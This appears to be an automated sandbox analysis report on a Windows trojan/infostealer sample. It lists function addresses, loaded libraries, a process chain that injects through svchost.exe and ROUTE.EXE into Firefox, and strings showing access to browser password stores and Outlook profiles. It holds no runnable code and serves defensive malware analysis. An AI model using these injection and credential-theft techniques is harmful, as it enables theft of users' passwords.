                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049C85C05_2_049C85C0
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CA5E05_2_049CA5E0
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049C87155_2_049C8715
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049C87105_2_049C8710
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CA3BA5_2_049CA3BA
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CA3C05_2_049CA3C0
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049D2BC05_2_049D2BC0
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049E93705_2_049E9370
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335A3526_2_0335A352
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033603E66_2_033603E6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032AE3F06_2_032AE3F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033402746_2_03340274
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033202C06_2_033202C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032901006_2_03290100
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0333A1186_2_0333A118
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033281586_2_03328158
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033541A26_2_033541A2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033601AA6_2_033601AA
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033581CC6_2_033581CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033320006_2_03332000
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A07706_2_032A0770
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032C47506_2_032C4750
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0329C7C06_2_0329C7C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BC6E06_2_032BC6E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A05356_2_032A0535
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033605916_2_03360591
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033444206_2_03344420
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033524466_2_03352446
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0334E4F66_2_0334E4F6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335AB406_2_0335AB40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03356BD76_2_03356BD7
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0329EA806_2_0329EA80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032B69626_2_032B6962
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A29A06_2_032A29A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0336A9A66_2_0336A9A6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A28406_2_032A2840
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032AA8406_2_032AA840
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032868B86_2_032868B8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032CE8F06_2_032CE8F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03342F306_2_03342F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032E2F286_2_032E2F28
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032C0F306_2_032C0F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03314F406_2_03314F40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0331EFA06_2_0331EFA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03292FC86_2_03292FC8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335EE266_2_0335EE26
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A0E596_2_032A0E59
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335CE936_2_0335CE93
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032B2E906_2_032B2E90
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335EEDB6_2_0335EEDB
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032AAD006_2_032AAD00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0333CD1F6_2_0333CD1F
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032B8DBF6_2_032B8DBF
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0329ADE06_2_0329ADE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A0C006_2_032A0C00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03340CB56_2_03340CB5
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03290CF26_2_03290CF2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335132D6_2_0335132D
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0328D34C6_2_0328D34C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032E739A6_2_032E739A
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A52A06_2_032A52A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033412ED6_2_033412ED
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BD2F06_2_032BD2F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BB2C06_2_032BB2C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D516C6_2_032D516C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0328F1726_2_0328F172
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0336B16B6_2_0336B16B
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032AB1B06_2_032AB1B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335F0E06_2_0335F0E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033570E96_2_033570E9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A70C06_2_032A70C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0334F0CC6_2_0334F0CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335F7B06_2_0335F7B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032E56306_2_032E5630
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033516CC6_2_033516CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033575716_2_03357571
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0333D5B06_2_0333D5B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033695C36_2_033695C3
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335F43F6_2_0335F43F
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032914606_2_03291460
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335FB766_2_0335FB76
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BFB806_2_032BFB80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03315BF06_2_03315BF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032DDBF96_2_032DDBF9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03313A6C6_2_03313A6C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03357A466_2_03357A46
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335FA496_2_0335FA49
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032E5AA06_2_032E5AA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03341AA36_2_03341AA3
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0333DAAC6_2_0333DAAC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0334DAC66_2_0334DAC6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033359106_2_03335910
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A99506_2_032A9950
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BB9506_2_032BB950
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0330D8006_2_0330D800
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A38E06_2_032A38E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335FF096_2_0335FF09
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335FFB16_2_0335FFB1
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A1F926_2_032A1F92
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03263FD56_2_03263FD5
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03263FD26_2_03263FD2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A9EB06_2_032A9EB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03357D736_2_03357D73
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A3D406_2_032A3D40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03351D5A6_2_03351D5A
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BFDC06_2_032BFDC0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03319C326_2_03319C32
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335FCF26_2_0335FCF2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AA22206_2_02AA2220
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02ABC0906_2_02ABC090
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9B2E06_2_02A9B2E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9D3006_2_02A9D300
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9D0E06_2_02A9D0E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9D0DA6_2_02A9D0DA
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9B4306_2_02A9B430
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9B4356_2_02A9B435
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AA3AEB6_2_02AA3AEB
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AA3AF06_2_02AA3AF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AA58E06_2_02AA58E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315E3046_2_0315E304
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315E7C46_2_0315E7C4
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315E4236_2_0315E423
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315CB536_2_0315CB53
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315CAE86_2_0315CAE8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315D8886_2_0315D888
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAEA12 appears 86 times
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: String function: 00D90A30 appears 46 times
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: String function: 00D8F9F2 appears 31 times
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: String function: 0331F290 appears 103 times
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: String function: 032D5130 appears 58 times
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: String function: 0330EA12 appears 86 times
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: String function: 0328B970 appears 262 times
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: String function: 032E7E54 appears 107 times
                Source: qlG7x91YXH.exe, 00000000.00000003.1795370593.0000000003C4D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs qlG7x91YXH.exe
                Source: qlG7x91YXH.exe, 00000000.00000003.1793473299.0000000003AA3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs qlG7x91YXH.exe
                Source: qlG7x91YXH.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@5/4
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE37B5 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DD10BF AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DD16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DFA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D742A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | File created: C:\Users\user\AppData\Local\Temp\aut9D99.tmp
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: ROUTE.EXE, 00000006.00000003.2459468023.0000000002E52000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3014722953.0000000002E52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: qlG7x91YXH.exe | Virustotal: Detection: 76%
                Source: qlG7x91YXH.exe | ReversingLabs: Detection: 73%
                Source: unknown | Process created: C:\Users\user\Desktop\qlG7x91YXH.exe "C:\Users\user\Desktop\qlG7x91YXH.exe"
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\qlG7x91YXH.exe"
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Binary string: route.pdb source: svchost.exe, 00000001.00000002.2268794550.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2237168620.000000000361A000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000002.3015192517.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sUcUmdUxGfN.exe, 00000005.00000000.2188712734.00000000008AE000.00000002.00000001.01000000.00000005.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3014341923.00000000008AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: qlG7x91YXH.exe, 00000000.00000003.1794086241.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1794826622.0000000003980000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2169838117.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2172327250.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2268906618.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2270778815.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.0000000003260000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: qlG7x91YXH.exe, 00000000.00000003.1794086241.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1794826622.0000000003980000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2269015858.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2169838117.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2172327250.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000006.00000003.2268906618.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2270778815.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.0000000003260000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ROUTE.EXE, 00000006.00000002.3016728519.000000000388C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3014722953.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338192888.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2576491008.000000001AA8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: route.pdbGCTL source: svchost.exe, 00000001.00000002.2268794550.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2237168620.000000000361A000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000002.3015192517.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000006.00000002.3016728519.000000000388C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3014722953.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338192888.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2576491008.000000001AA8C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00D742DE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D90A76 push ecx; ret 0_2_00D90A89
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00415ED3 push ebx; iretd 1_2_00416003
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004149FF push cs; iretd 1_2_00414A15
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004031B0 push eax; ret 1_2_004031B2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00415AC5 push esi; retf 1_2_00415AC9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004183BF push ebx; ret 1_2_004183C7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00415C9E push eax; iretd 1_2_00415CA2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00411D0F push cs; iretd 1_2_00411D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414DF9 push FFFFFFB4h; retf 1_2_00414DFD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00411E22 push esp; ret 1_2_00411E23
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004016FF push edi; ret 1_2_00401701
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041468B push ecx; ret 1_2_0041468C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040171C push ss; ret 1_2_00401723
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00415F38 push ebx; iretd 1_2_00416003
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418FDC push edx; iretd 1_2_00418FDD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0225F pushad ; ret 1_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C027FA pushad ; ret 1_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx 1_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0283D push eax; iretd 1_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C01368 push eax; iretd 1_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C01065 push edi; ret 1_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C018F3 push edx; iretd 1_2_03C01906
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Code function: 5_2_049D24EC push ebx; ret 5_2_049D24F4
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Code function: 5_2_049CEDB0 push FFFFFFB4h; retf 5_2_049CEF2A
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Code function: 5_2_049CFDCB push eax; iretd 5_2_049CFDCF
